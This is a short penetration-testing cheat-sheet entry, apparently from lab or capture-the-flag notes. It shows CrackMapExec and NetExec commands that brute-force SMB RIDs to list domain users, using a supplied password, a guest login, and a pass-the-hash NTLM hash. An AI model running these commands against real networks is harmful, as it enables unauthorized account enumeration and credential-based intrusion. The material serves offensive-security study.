CrackMapExec / NetExec - RID Brute
Authenticated RID brute
crackmapexec smb 10.10.253.194 -u 'twilliams' -p 'roastpotatoes' --rid-brute | tee crackmapexec-rid-brute
netexec smb 10.10.253.194 -u 'twilliams' -p 'roastpotatoes' --rid-brute | tee crackmapexec-rid-brute
Sometimes works as guest
crackmapexec smb 10.10.253.194 -u 'guest' -p '' --rid-brute | tee crackmapexec-rid-brute
netexec smb $target -u 'guest' -p '' --rid-brute | grep -i 'sidtypeuser' | awk '{print$6}' | cut -d '\' -f2 | tee userlist2.txt
Pull users via NTLM hash
netexec smb $target -u leicester.lawton -H 25cac0569934a5f6e01e9e440e0dce5b --users | awk '{print$5}' | fgrep -v '[*]' | tee users2